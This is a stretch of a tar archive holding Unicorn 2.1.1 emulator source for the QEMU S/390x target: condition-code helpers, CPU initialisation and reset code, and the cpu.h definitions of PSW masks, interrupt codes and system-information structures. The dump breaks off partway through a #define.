CC_OP_SUBU_32: r = cc_calc_subu_32(src, dst, vr); break; case CC_OP_SUBB_32: r = cc_calc_subb_32(src, dst, vr); break; case CC_OP_ABS_32: r = cc_calc_abs_32(dst); break; case CC_OP_NABS_32: r = cc_calc_nabs_32(dst); break; case CC_OP_COMP_32: r = cc_calc_comp_32(dst); break; case CC_OP_ICM: r = cc_calc_icm(src, dst); break; case CC_OP_SLA: r = cc_calc_sla(src, dst); break; case CC_OP_FLOGR: r = cc_calc_flogr(dst); break; case CC_OP_LCBB: r = cc_calc_lcbb(dst); break; case CC_OP_VC: r = cc_calc_vc(src, dst); break; case CC_OP_NZ_F32: r = set_cc_nz_f32(dst); break; case CC_OP_NZ_F64: r = set_cc_nz_f64(dst); break; case CC_OP_NZ_F128: r = set_cc_nz_f128(make_float128(src, dst)); break; default: cpu_abort(env_cpu(env), "Unknown CC operation: %s\n", cc_name(cc_op)); } HELPER_LOG("%s: %15s 0x%016lx 0x%016lx 0x%016lx = %d\n", __func__, cc_name(cc_op), src, dst, vr, r); return r; } uint32_t calc_cc(CPUS390XState *env, uint32_t cc_op, uint64_t src, uint64_t dst, uint64_t vr) { return do_calc_cc(env, cc_op, src, dst, vr); } uint32_t HELPER(calc_cc)(CPUS390XState *env, uint32_t cc_op, uint64_t src, uint64_t dst, uint64_t vr) { return do_calc_cc(env, cc_op, src, dst, vr); } #ifndef CONFIG_USER_ONLY void HELPER(load_psw)(CPUS390XState *env, uint64_t mask, uint64_t addr) { load_psw(env, mask, addr); cpu_loop_exit(env_cpu(env)); } void HELPER(sacf)(CPUS390XState *env, uint64_t a1) { HELPER_LOG("%s: %16" PRIx64 "\n", __func__, a1); switch (a1 & 0xf00) { case 0x000: env->psw.mask &= ~PSW_MASK_ASC; env->psw.mask |= PSW_ASC_PRIMARY; break; case 0x100: env->psw.mask &= ~PSW_MASK_ASC; env->psw.mask |= PSW_ASC_SECONDARY; break; case 0x300: env->psw.mask &= ~PSW_MASK_ASC; env->psw.mask |= PSW_ASC_HOME; break; default: HELPER_LOG("unknown sacf mode: %" PRIx64 "\n", a1); tcg_s390_program_interrupt(env, PGM_SPECIFICATION, GETPC()); } } #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cpu-param.h���������������������������������������������������������0000664�0000000�0000000�00000000517�14675241067�0020370�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S/390 cpu parameters for qemu. * * Copyright (c) 2009 Ulrich Hecht * SPDX-License-Identifier: GPL-2.0+ */ #ifndef S390_CPU_PARAM_H #define S390_CPU_PARAM_H 1 #define TARGET_LONG_BITS 64 #define TARGET_PAGE_BITS 12 #define TARGET_PHYS_ADDR_SPACE_BITS 64 #define TARGET_VIRT_ADDR_SPACE_BITS 64 #define NB_MMU_MODES 4 #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cpu-qom.h�����������������������������������������������������������0000664�0000000�0000000�00000003563�14675241067�0020070�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU S/390 CPU * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see * <http://www.gnu.org/licenses/lgpl-2.1.html> */ #ifndef QEMU_S390_CPU_QOM_H #define QEMU_S390_CPU_QOM_H #include "hw/core/cpu.h" #define S390_CPU(obj) ((S390CPU *)obj) #define S390_CPU_CLASS(klass) ((S390CPUClass *)klass) #define S390_CPU_GET_CLASS(obj) (&((S390CPU *)obj)->cc) typedef struct S390CPUModel S390CPUModel; typedef struct S390CPUDef S390CPUDef; typedef enum cpu_reset_type { S390_CPU_RESET_NORMAL, S390_CPU_RESET_INITIAL, S390_CPU_RESET_CLEAR, } cpu_reset_type; /** * S390CPUClass: * @parent_realize: The parent class' realize handler. * @parent_reset: The parent class' reset handler. * @load_normal: Performs a load normal. * @cpu_reset: Performs a CPU reset. * @initial_cpu_reset: Performs an initial CPU reset. * * An S/390 CPU model. */ typedef struct S390CPUClass { /*< private >*/ CPUClass parent_class; /*< public >*/ const S390CPUDef *cpu_def; bool is_static; // const char *desc; qq void (*load_normal)(CPUState *cpu); void (*reset)(CPUState *cpu, cpu_reset_type type); void (*parent_reset)(CPUState *cpu); } S390CPUClass; typedef struct S390CPU S390CPU; typedef struct CPUS390XState CPUS390XState; #endif ���������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cpu.c���������������������������������������������������������������0000664�0000000�0000000�00000016617�14675241067�0017275�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU S/390 CPU * * Copyright (c) 2009 Ulrich Hecht * Copyright (c) 2011 Alexander Graf * Copyright (c) 2012 SUSE LINUX Products GmbH * Copyright (c) 2012 IBM Corp. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "qemu/timer.h" #include "sysemu/sysemu.h" #include "sysemu/tcg.h" #include "fpu/softfloat-helpers.h" #include "exec/exec-all.h" #define CR0_RESET 0xE0UL #define CR14_RESET 0xC2000000UL; static void s390_cpu_set_pc(CPUState *cs, vaddr value) { S390CPU *cpu = S390_CPU(cs); cpu->env.psw.addr = value; } static bool s390_cpu_has_work(CPUState *cs) { S390CPU *cpu = S390_CPU(cs); #if 0 /* STOPPED cpus can never wake up */ if (s390_cpu_get_state(cpu) != S390_CPU_STATE_LOAD && s390_cpu_get_state(cpu) != S390_CPU_STATE_OPERATING) { return false; } #endif if (!(cs->interrupt_request & CPU_INTERRUPT_HARD)) { return false; } return s390_cpu_has_int(cpu); } /* S390CPUClass::reset() */ static void s390_cpu_reset(CPUState *dev, cpu_reset_type type) { CPUState *s = CPU(dev); S390CPU *cpu = S390_CPU(s); S390CPUClass *scc = S390_CPU_GET_CLASS(cpu); CPUS390XState *env = &cpu->env; scc->parent_reset(dev); cpu->env.sigp_order = 0; s390_cpu_set_state(S390_CPU_STATE_STOPPED, cpu); switch (type) { case S390_CPU_RESET_CLEAR: memset(env, 0, offsetof(CPUS390XState, start_initial_reset_fields)); /* fall through */ case S390_CPU_RESET_INITIAL: /* initial reset does not clear everything! */ memset(&env->start_initial_reset_fields, 0, offsetof(CPUS390XState, start_normal_reset_fields) - offsetof(CPUS390XState, start_initial_reset_fields)); /* architectured initial value for Breaking-Event-Address register */ env->gbea = 1; /* architectured initial values for CR 0 and 14 */ env->cregs[0] = CR0_RESET; env->cregs[14] = CR14_RESET; /* tininess for underflow is detected before rounding */ set_float_detect_tininess(float_tininess_before_rounding, &env->fpu_status); /* fall through */ case S390_CPU_RESET_NORMAL: env->psw.mask &= ~PSW_MASK_RI; memset(&env->start_normal_reset_fields, 0, offsetof(CPUS390XState, end_reset_fields) - offsetof(CPUS390XState, start_normal_reset_fields)); env->pfault_token = -1UL; env->bpbc = false; break; default: g_assert_not_reached(); } } static void s390_cpu_realizefn(struct uc_struct *uc, CPUState *dev) { CPUState *cs = CPU(dev); S390CPU *cpu = S390_CPU(dev); /* the model has to be realized before qemu_init_vcpu() due to kvm */ // s390_realize_cpu_model(cs); /* sync cs->cpu_index and env->core_id. The latter is needed for TCG. */ cs->cpu_index = cpu->env.core_id; cpu_exec_realizefn(cs); qemu_init_vcpu(cs); cpu_reset(cs); } static void s390_cpu_initfn(struct uc_struct *uc, CPUState *obj) { CPUState *cs = CPU(obj); S390CPU *cpu = S390_CPU(obj); cpu_set_cpustate_pointers(cpu); cs->halted = 1; cs->exception_index = EXCP_HLT; // s390_cpu_model_register_props(obj); // cpu->env.tod_timer = // timer_new_ns(QEMU_CLOCK_VIRTUAL, s390x_tod_timer, cpu); // cpu->env.cpu_timer = // timer_new_ns(QEMU_CLOCK_VIRTUAL, s390x_cpu_timer, cpu); s390_cpu_set_state(S390_CPU_STATE_STOPPED, cpu); cpu->env.uc = uc; } static unsigned s390_count_running_cpus(void) { return 1; } unsigned int s390_cpu_halt(S390CPU *cpu) { CPUState *cs = CPU(cpu); if (!cs->halted) { cs->halted = 1; cs->exception_index = EXCP_HLT; } return s390_count_running_cpus(); } void s390_cpu_unhalt(S390CPU *cpu) { CPUState *cs = CPU(cpu); if (cs->halted) { cs->halted = 0; cs->exception_index = -1; } } unsigned int s390_cpu_set_state(uint8_t cpu_state, S390CPU *cpu) { switch (cpu_state) { case S390_CPU_STATE_STOPPED: case S390_CPU_STATE_CHECK_STOP: /* halt the cpu for common infrastructure */ s390_cpu_halt(cpu); break; case S390_CPU_STATE_OPERATING: case S390_CPU_STATE_LOAD: /* * Starting a CPU with a PSW WAIT bit set: * KVM: handles this internally and triggers another WAIT exit. * TCG: will actually try to continue to run. Don't unhalt, will * be done when the CPU actually has work (an interrupt). */ if (!(cpu->env.psw.mask & PSW_MASK_WAIT)) { s390_cpu_unhalt(cpu); } break; default: //error_report("Requested CPU state is not a valid S390 CPU state: %u", // cpu_state); exit(1); } cpu->env.cpu_state = cpu_state; return s390_count_running_cpus(); } int s390_set_memory_limit(uint64_t new_limit, uint64_t *hw_limit) { return 0; } void s390_set_max_pagesize(uint64_t pagesize) { } void s390_cmma_reset(void) { } void s390_crypto_reset(void) { } void s390_enable_css_support(S390CPU *cpu) { } static void s390_cpu_class_init(struct uc_struct *uc, CPUClass *oc) { S390CPUClass *scc = S390_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(scc); scc->reset = s390_cpu_reset; cc->has_work = s390_cpu_has_work; // cc->do_interrupt = s390_cpu_do_interrupt; cc->set_pc = s390_cpu_set_pc; cc->get_phys_page_debug = s390_cpu_get_phys_page_debug; cc->cpu_exec_interrupt = s390_cpu_exec_interrupt; cc->debug_excp_handler = s390x_cpu_debug_excp_handler; cc->do_unaligned_access = s390x_cpu_do_unaligned_access; cc->tcg_initialize = s390x_translate_init; cc->tlb_fill_cpu = s390_cpu_tlb_fill; // s390_cpu_model_class_register_props(oc); } S390CPU *cpu_s390_init(struct uc_struct *uc, const char *cpu_model) { S390CPU *cpu; CPUState *cs; CPUClass *cc; // int i; cpu = calloc(1, sizeof(*cpu)); if (cpu == NULL) { return NULL; } if (uc->cpu_model == INT_MAX) { uc->cpu_model = UC_CPU_S390X_QEMU; // qemu-s390x-cpu } else if (uc->cpu_model > UC_CPU_S390X_MAX) { free(cpu); return NULL; } cs = (CPUState *)cpu; cc = (CPUClass *)&cpu->cc; cs->cc = cc; cs->uc = uc; uc->cpu = (CPUState *)cpu; /* init CPUClass */ cpu_class_init(uc, cc); /* init CPUClass */ s390_cpu_class_init(uc, cc); // init skeys s390_skeys_init(uc); // init s390 models s390_init_cpu_model(uc, uc->cpu_model); /* init CPUState */ cpu_common_initfn(uc, cs); /* init CPU */ s390_cpu_initfn(uc, cs); /* realize CPU */ s390_cpu_realizefn(uc, cs); // init addresss space cpu_address_space_init(cs, 0, cs->memory); //qemu_init_vcpu(cs); return cpu; } �����������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cpu.h���������������������������������������������������������������0000664�0000000�0000000�00000067141�14675241067�0017300�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S/390 virtual CPU header * * For details on the s390x architecture and used definitions (e.g., * PSW, PER and DAT (Dynamic Address Translation)), please refer to * the "z/Architecture Principles of Operations" - a.k.a. PoP. * * Copyright (c) 2009 Ulrich Hecht * Copyright IBM Corp. 2012, 2018 * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see <http://www.gnu.org/licenses/>. */ #ifndef S390X_CPU_H #define S390X_CPU_H #include "cpu-qom.h" #include "cpu_models.h" #include "exec/cpu-defs.h" #include "hw/s390x/storage-keys.h" #define ELF_MACHINE_UNAME "S390X" /* The z/Architecture has a strong memory model with some store-after-load re-ordering */ #define TCG_GUEST_DEFAULT_MO (TCG_MO_ALL & ~TCG_MO_ST_LD) #define TARGET_INSN_START_EXTRA_WORDS 2 #define MMU_USER_IDX 0 #define S390_MAX_CPUS 248 typedef struct PSW { uint64_t mask; uint64_t addr; } PSW; struct CPUS390XState { uint64_t regs[16]; /* GP registers */ /* * The floating point registers are part of the vector registers. * vregs[0][0] -> vregs[15][0] are 16 floating point registers */ uint64_t vregs[32][2] QEMU_ALIGNED(16); /* vector registers */ uint32_t aregs[16]; /* access registers */ uint64_t gscb[4]; /* guarded storage control */ uint64_t etoken; /* etoken */ uint64_t etoken_extension; /* etoken extension */ /* Fields up to this point are not cleared by initial CPU reset */ int start_initial_reset_fields; uint32_t fpc; /* floating-point control register */ uint32_t cc_op; bool bpbc; /* branch prediction blocking */ float_status fpu_status; /* passed to softfloat lib */ /* The low part of a 128-bit return, or remainder of a divide. */ uint64_t retxl; PSW psw; // S390CrashReason crash_reason; uint64_t cc_src; uint64_t cc_dst; uint64_t cc_vr; uint64_t ex_value; uint64_t __excp_addr; uint64_t psa; uint32_t int_pgm_code; uint32_t int_pgm_ilen; uint32_t int_svc_code; uint32_t int_svc_ilen; uint64_t per_address; uint16_t per_perc_atmid; uint64_t cregs[16]; /* control registers */ uint64_t ckc; uint64_t cputm; uint32_t todpr; uint64_t pfault_token; uint64_t pfault_compare; uint64_t pfault_select; uint64_t gbea; uint64_t pp; /* Fields up to this point are not cleared by normal CPU reset */ int start_normal_reset_fields; uint8_t riccb[64]; /* runtime instrumentation control */ int pending_int; uint16_t external_call_addr; DECLARE_BITMAP(emergency_signals, S390_MAX_CPUS); /* Fields up to this point are cleared by a CPU reset */ int end_reset_fields; uint32_t core_id; /* PoP "CPU address", same as cpu_index */ uint64_t cpuid; // QEMUTimer *tod_timer; // QEMUTimer *cpu_timer; /* * The cpu state represents the logical state of a cpu. In contrast to other * architectures, there is a difference between a halt and a stop on s390. * If all cpus are either stopped (including check stop) or in the disabled * wait state, the vm can be shut down. * The acceptable cpu_state values are defined in the CpuInfoS390State * enum. */ uint8_t cpu_state; /* currently processed sigp order */ uint8_t sigp_order; // Unicorn engine struct uc_struct *uc; }; static inline uint64_t *get_freg(CPUS390XState *cs, int nr) { return &cs->vregs[nr][0]; } /** * S390CPU: * @env: #CPUS390XState. * * An S/390 CPU. */ struct S390CPU { /*< private >*/ CPUState parent_obj; /*< public >*/ CPUNegativeOffsetState neg; CPUS390XState env; S390CPUModel *model; /* needed for live migration */ // void *irqstate; // uint32_t irqstate_saved_size; // unicorn struct S390CPUClass cc; struct S390SKeysClass skey; struct QEMUS390SKeysState ss; }; /* distinguish between 24 bit and 31 bit addressing */ #define HIGH_ORDER_BIT 0x80000000 /* Interrupt Codes */ /* Program Interrupts */ #define PGM_OPERATION 0x0001 #define PGM_PRIVILEGED 0x0002 #define PGM_EXECUTE 0x0003 #define PGM_PROTECTION 0x0004 #define PGM_ADDRESSING 0x0005 #define PGM_SPECIFICATION 0x0006 #define PGM_DATA 0x0007 #define PGM_FIXPT_OVERFLOW 0x0008 #define PGM_FIXPT_DIVIDE 0x0009 #define PGM_DEC_OVERFLOW 0x000a #define PGM_DEC_DIVIDE 0x000b #define PGM_HFP_EXP_OVERFLOW 0x000c #define PGM_HFP_EXP_UNDERFLOW 0x000d #define PGM_HFP_SIGNIFICANCE 0x000e #define PGM_HFP_DIVIDE 0x000f #define PGM_SEGMENT_TRANS 0x0010 #define PGM_PAGE_TRANS 0x0011 #define PGM_TRANS_SPEC 0x0012 #define PGM_SPECIAL_OP 0x0013 #define PGM_OPERAND 0x0015 #define PGM_TRACE_TABLE 0x0016 #define PGM_VECTOR_PROCESSING 0x001b #define PGM_SPACE_SWITCH 0x001c #define PGM_HFP_SQRT 0x001d #define PGM_PC_TRANS_SPEC 0x001f #define PGM_AFX_TRANS 0x0020 #define PGM_ASX_TRANS 0x0021 #define PGM_LX_TRANS 0x0022 #define PGM_EX_TRANS 0x0023 #define PGM_PRIM_AUTH 0x0024 #define PGM_SEC_AUTH 0x0025 #define PGM_ALET_SPEC 0x0028 #define PGM_ALEN_SPEC 0x0029 #define PGM_ALE_SEQ 0x002a #define PGM_ASTE_VALID 0x002b #define PGM_ASTE_SEQ 0x002c #define PGM_EXT_AUTH 0x002d #define PGM_STACK_FULL 0x0030 #define PGM_STACK_EMPTY 0x0031 #define PGM_STACK_SPEC 0x0032 #define PGM_STACK_TYPE 0x0033 #define PGM_STACK_OP 0x0034 #define PGM_ASCE_TYPE 0x0038 #define PGM_REG_FIRST_TRANS 0x0039 #define PGM_REG_SEC_TRANS 0x003a #define PGM_REG_THIRD_TRANS 0x003b #define PGM_MONITOR 0x0040 #define PGM_PER 0x0080 #define PGM_CRYPTO 0x0119 /* External Interrupts */ #define EXT_INTERRUPT_KEY 0x0040 #define EXT_CLOCK_COMP 0x1004 #define EXT_CPU_TIMER 0x1005 #define EXT_MALFUNCTION 0x1200 #define EXT_EMERGENCY 0x1201 #define EXT_EXTERNAL_CALL 0x1202 #define EXT_ETR 0x1406 #define EXT_SERVICE 0x2401 #define EXT_VIRTIO 0x2603 /* PSW defines */ #undef PSW_MASK_PER #undef PSW_MASK_UNUSED_2 #undef PSW_MASK_UNUSED_3 #undef PSW_MASK_DAT #undef PSW_MASK_IO #undef PSW_MASK_EXT #undef PSW_MASK_KEY #undef PSW_SHIFT_KEY #undef PSW_MASK_MCHECK #undef PSW_MASK_WAIT #undef PSW_MASK_PSTATE #undef PSW_MASK_ASC #undef PSW_SHIFT_ASC #undef PSW_MASK_CC #undef PSW_MASK_PM #undef PSW_MASK_RI #undef PSW_SHIFT_MASK_PM #undef PSW_MASK_64 #undef PSW_MASK_32 #undef PSW_MASK_ESA_ADDR #define PSW_MASK_PER 0x4000000000000000ULL #define PSW_MASK_UNUSED_2 0x2000000000000000ULL #define PSW_MASK_UNUSED_3 0x1000000000000000ULL #define PSW_MASK_DAT 0x0400000000000000ULL #define PSW_MASK_IO 0x0200000000000000ULL #define PSW_MASK_EXT 0x0100000000000000ULL #define PSW_MASK_KEY 0x00F0000000000000ULL #define PSW_SHIFT_KEY 52 #define PSW_MASK_SHORTPSW 0x0008000000000000ULL #define PSW_MASK_MCHECK 0x0004000000000000ULL #define PSW_MASK_WAIT 0x0002000000000000ULL #define PSW_MASK_PSTATE 0x0001000000000000ULL #define PSW_MASK_ASC 0x0000C00000000000ULL #define PSW_SHIFT_ASC 46 #define PSW_MASK_CC 0x0000300000000000ULL #define PSW_MASK_PM 0x00000F0000000000ULL #define PSW_SHIFT_MASK_PM 40 #define PSW_MASK_RI 0x0000008000000000ULL #define PSW_MASK_64 0x0000000100000000ULL #define PSW_MASK_32 0x0000000080000000ULL #define PSW_MASK_SHORT_ADDR 0x000000007fffffffULL #define PSW_MASK_SHORT_CTRL 0xffffffff80000000ULL #undef PSW_ASC_PRIMARY #undef PSW_ASC_ACCREG #undef PSW_ASC_SECONDARY #undef PSW_ASC_HOME #define PSW_ASC_PRIMARY 0x0000000000000000ULL #define PSW_ASC_ACCREG 0x0000400000000000ULL #define PSW_ASC_SECONDARY 0x0000800000000000ULL #define PSW_ASC_HOME 0x0000C00000000000ULL /* the address space values shifted */ #define AS_PRIMARY 0 #define AS_ACCREG 1 #define AS_SECONDARY 2 #define AS_HOME 3 /* tb flags */ #define FLAG_MASK_PSW_SHIFT 31 #define FLAG_MASK_PER (PSW_MASK_PER >> FLAG_MASK_PSW_SHIFT) #define FLAG_MASK_DAT (PSW_MASK_DAT >> FLAG_MASK_PSW_SHIFT) #define FLAG_MASK_PSTATE (PSW_MASK_PSTATE >> FLAG_MASK_PSW_SHIFT) #define FLAG_MASK_ASC (PSW_MASK_ASC >> FLAG_MASK_PSW_SHIFT) #define FLAG_MASK_64 (PSW_MASK_64 >> FLAG_MASK_PSW_SHIFT) #define FLAG_MASK_32 (PSW_MASK_32 >> FLAG_MASK_PSW_SHIFT) #define FLAG_MASK_PSW (FLAG_MASK_PER | FLAG_MASK_DAT | FLAG_MASK_PSTATE \ | FLAG_MASK_ASC | FLAG_MASK_64 | FLAG_MASK_32) /* we'll use some unused PSW positions to store CR flags in tb flags */ #define FLAG_MASK_AFP (PSW_MASK_UNUSED_2 >> FLAG_MASK_PSW_SHIFT) #define FLAG_MASK_VECTOR (PSW_MASK_UNUSED_3 >> FLAG_MASK_PSW_SHIFT) /* Control register 0 bits */ #define CR0_LOWPROT 0x0000000010000000ULL #define CR0_SECONDARY 0x0000000004000000ULL #define CR0_EDAT 0x0000000000800000ULL #define CR0_AFP 0x0000000000040000ULL #define CR0_VECTOR 0x0000000000020000ULL #define CR0_IEP 0x0000000000100000ULL #define CR0_EMERGENCY_SIGNAL_SC 0x0000000000004000ULL #define CR0_EXTERNAL_CALL_SC 0x0000000000002000ULL #define CR0_CKC_SC 0x0000000000000800ULL #define CR0_CPU_TIMER_SC 0x0000000000000400ULL #define CR0_SERVICE_SC 0x0000000000000200ULL /* Control register 14 bits */ #define CR14_CHANNEL_REPORT_SC 0x0000000010000000ULL /* MMU */ #define MMU_PRIMARY_IDX 0 #define MMU_SECONDARY_IDX 1 #define MMU_HOME_IDX 2 #define MMU_REAL_IDX 3 static inline int cpu_mmu_index(CPUS390XState *env, bool ifetch) { if (!(env->psw.mask & PSW_MASK_DAT)) { return MMU_REAL_IDX; } if (ifetch) { if ((env->psw.mask & PSW_MASK_ASC) == PSW_ASC_HOME) { return MMU_HOME_IDX; } return MMU_PRIMARY_IDX; } switch (env->psw.mask & PSW_MASK_ASC) { case PSW_ASC_PRIMARY: return MMU_PRIMARY_IDX; case PSW_ASC_SECONDARY: return MMU_SECONDARY_IDX; case PSW_ASC_HOME: return MMU_HOME_IDX; case PSW_ASC_ACCREG: /* Fallthrough: access register mode is not yet supported */ default: abort(); } } static inline void cpu_get_tb_cpu_state(CPUS390XState* env, target_ulong *pc, target_ulong *cs_base, uint32_t *flags) { *pc = env->psw.addr; *cs_base = env->ex_value; *flags = (env->psw.mask >> FLAG_MASK_PSW_SHIFT) & FLAG_MASK_PSW; if (env->cregs[0] & CR0_AFP) { *flags |= FLAG_MASK_AFP; } if (env->cregs[0] & CR0_VECTOR) { *flags |= FLAG_MASK_VECTOR; } } /* PER bits from control register 9 */ #define PER_CR9_EVENT_BRANCH 0x80000000 #define PER_CR9_EVENT_IFETCH 0x40000000 #define PER_CR9_EVENT_STORE 0x20000000 #define PER_CR9_EVENT_STORE_REAL 0x08000000 #define PER_CR9_EVENT_NULLIFICATION 0x01000000 #define PER_CR9_CONTROL_BRANCH_ADDRESS 0x00800000 #define PER_CR9_CONTROL_ALTERATION 0x00200000 /* PER bits from the PER CODE/ATMID/AI in lowcore */ #define PER_CODE_EVENT_BRANCH 0x8000 #define PER_CODE_EVENT_IFETCH 0x4000 #define PER_CODE_EVENT_STORE 0x2000 #define PER_CODE_EVENT_STORE_REAL 0x0800 #define PER_CODE_EVENT_NULLIFICATION 0x0100 #define EXCP_EXT 1 /* external interrupt */ #define EXCP_SVC 2 /* supervisor call (syscall) */ #define EXCP_PGM 3 /* program interruption */ #define EXCP_RESTART 4 /* restart interrupt */ #define EXCP_STOP 5 /* stop interrupt */ #define EXCP_IO 7 /* I/O interrupt */ #define EXCP_MCHK 8 /* machine check */ #define INTERRUPT_EXT_CPU_TIMER (1 << 3) #define INTERRUPT_EXT_CLOCK_COMPARATOR (1 << 4) #define INTERRUPT_EXTERNAL_CALL (1 << 5) #define INTERRUPT_EMERGENCY_SIGNAL (1 << 6) #define INTERRUPT_RESTART (1 << 7) #define INTERRUPT_STOP (1 << 8) /* Program Status Word. */ #define S390_PSWM_REGNUM 0 #define S390_PSWA_REGNUM 1 /* General Purpose Registers. */ #define S390_R0_REGNUM 2 #define S390_R1_REGNUM 3 #define S390_R2_REGNUM 4 #define S390_R3_REGNUM 5 #define S390_R4_REGNUM 6 #define S390_R5_REGNUM 7 #define S390_R6_REGNUM 8 #define S390_R7_REGNUM 9 #define S390_R8_REGNUM 10 #define S390_R9_REGNUM 11 #define S390_R10_REGNUM 12 #define S390_R11_REGNUM 13 #define S390_R12_REGNUM 14 #define S390_R13_REGNUM 15 #define S390_R14_REGNUM 16 #define S390_R15_REGNUM 17 /* Total Core Registers. */ #define S390_NUM_CORE_REGS 18 static inline void setcc(S390CPU *cpu, uint64_t cc) { CPUS390XState *env = &cpu->env; env->psw.mask &= ~(3ull << 44); env->psw.mask |= (cc & 3) << 44; env->cc_op = cc; } /* STSI */ #define STSI_R0_FC_MASK 0x00000000f0000000ULL #define STSI_R0_FC_CURRENT 0x0000000000000000ULL #define STSI_R0_FC_LEVEL_1 0x0000000010000000ULL #define STSI_R0_FC_LEVEL_2 0x0000000020000000ULL #define STSI_R0_FC_LEVEL_3 0x0000000030000000ULL #define STSI_R0_RESERVED_MASK 0x000000000fffff00ULL #define STSI_R0_SEL1_MASK 0x00000000000000ffULL #define STSI_R1_RESERVED_MASK 0x00000000ffff0000ULL #define STSI_R1_SEL2_MASK 0x000000000000ffffULL /* Basic Machine Configuration */ typedef struct SysIB_111 { uint8_t res1[32]; uint8_t manuf[16]; uint8_t type[4]; uint8_t res2[12]; uint8_t model[16]; uint8_t sequence[16]; uint8_t plant[4]; uint8_t res3[3996]; } SysIB_111; QEMU_BUILD_BUG_ON(sizeof(SysIB_111) != 4096); /* Basic Machine CPU */ typedef struct SysIB_121 { uint8_t res1[80]; uint8_t sequence[16]; uint8_t plant[4]; uint8_t res2[2]; uint16_t cpu_addr; uint8_t res3[3992]; } SysIB_121; QEMU_BUILD_BUG_ON(sizeof(SysIB_121) != 4096); /* Basic Machine CPUs */ typedef struct SysIB_122 { uint8_t res1[32]; uint32_t capability; uint16_t total_cpus; uint16_t conf_cpus; uint16_t standby_cpus; uint16_t reserved_cpus; uint16_t adjustments[2026]; } SysIB_122; QEMU_BUILD_BUG_ON(sizeof(SysIB_122) != 4096); /* LPAR CPU */ typedef struct SysIB_221 { uint8_t res1[80]; uint8_t sequence[16]; uint8_t plant[4]; uint16_t cpu_id; uint16_t cpu_addr; uint8_t res3[3992]; } SysIB_221; QEMU_BUILD_BUG_ON(sizeof(SysIB_221) != 4096); /* LPAR CPUs */ typedef struct SysIB_222 { uint8_t res1[32]; uint16_t lpar_num; uint8_t res2; uint8_t lcpuc; uint16_t total_cpus; uint16_t conf_cpus; uint16_t standby_cpus; uint16_t reserved_cpus; uint8_t name[8]; uint32_t caf; uint8_t res3[16]; uint16_t dedicated_cpus; uint16_t shared_cpus; uint8_t res4[4020]; } SysIB_222; QEMU_BUILD_BUG_ON(sizeof(SysIB_222) != 4096); /* VM CPUs */ typedef struct SysIB_322 { uint8_t res1[31]; uint8_t count; struct { uint8_t res2[4]; uint16_t total_cpus; uint16_t conf_cpus; uint16_t standby_cpus; uint16_t reserved_cpus; uint8_t name[8]; uint32_t caf; uint8_t cpi[16]; uint8_t res5[3]; uint8_t ext_name_encoding; uint32_t res3; uint8_t uuid[16]; } vm[8]; uint8_t res4[1504]; uint8_t ext_names[8][256]; } SysIB_322; QEMU_BUILD_BUG_ON(sizeof(SysIB_322) != 4096); typedef union SysIB { SysIB_111 sysib_111; SysIB_121 sysib_121; SysIB_122 sysib_122; SysIB_221 sysib_221; SysIB_222 sysib_222; SysIB_322 sysib_322; } SysIB; QEMU_BUILD_BUG_ON(sizeof(SysIB) != 4096); /* MMU defines */ #define ASCE_ORIGIN (~0xfffULL) /* segment table origin */ #define ASCE_SUBSPACE 0x200 /* subspace group control */ #define ASCE_PRIVATE_SPACE 0x100 /* private space control */ #define ASCE_ALT_EVENT 0x80 /* storage alteration event control */ #define ASCE_SPACE_SWITCH 0x40 /* space switch event */ #define ASCE_REAL_SPACE 0x20 /* real space control */ #define ASCE_TYPE_MASK 0x0c /* asce table type mask */ #define ASCE_TYPE_REGION1 0x0c /* region first table type */ #define ASCE_TYPE_REGION2 0x08 /* region second table type */ #define ASCE_TYPE_REGION3 0x04 /* region third table type */ #define ASCE_TYPE_SEGMENT 0x00 /* segment table type */ #define ASCE_TABLE_LENGTH 0x03 /* region table length */ #define REGION_ENTRY_ORIGIN 0xfffffffffffff000ULL #define REGION_ENTRY_P 0x0000000000000200ULL #define REGION_ENTRY_TF 0x00000000000000c0ULL #define REGION_ENTRY_I 0x0000000000000020ULL #define REGION_ENTRY_TT 0x000000000000000cULL #define REGION_ENTRY_TL 0x0000000000000003ULL #define REGION_ENTRY_TT_REGION1 0x000000000000000cULL #define REGION_ENTRY_TT_REGION2 0x0000000000000008ULL #define REGION_ENTRY_TT_REGION3 0x0000000000000004ULL #define 